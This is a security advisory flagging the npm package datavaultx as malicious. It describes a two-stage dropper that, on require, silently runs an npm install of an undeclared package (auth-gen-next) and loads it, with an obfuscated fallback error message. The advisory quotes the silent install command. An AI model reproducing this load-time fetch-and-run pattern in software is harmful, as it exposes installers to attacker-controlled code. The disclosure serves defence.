MAL-2026-10460
Malicious code in datavaultx (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (bbf831f155eb2a6d04427e5cc3cd239055844e80c3b02576a5d546e4e7ab42b6) On require of the package's main entry (auth.js -> lib/writer.js), the module attempts require('auth-gen-next'); on failure it invokes execSync('npm install auth-gen-next --no-warnings --no-save --no-progress --loglevel silent') and then requires the freshly installed module from../../auth-gen-next/index.js. The fetched package is not declared in this package's dependencies, so its contents are entirely attacker-controlled and can change at any time without a datavaultx release. lib/writer.js additionally constructs a cover-story error string ('Error: This environment is not supported...') via a long chain of String.fromCharCode calls, shown only if the silent install fails. The suppressed logging, undeclared dependency, and character-code obfuscation of the failure message together indicate a two-stage dropper design in which the visible package is a thin shim that pulls its real payload from a separately-published module at load time.
Are you affected?
Enter the version of the package you're using.
Affected packages
No fixed version published yet for datavaultx (npm). Pin to a known-safe version or switch to an alternative.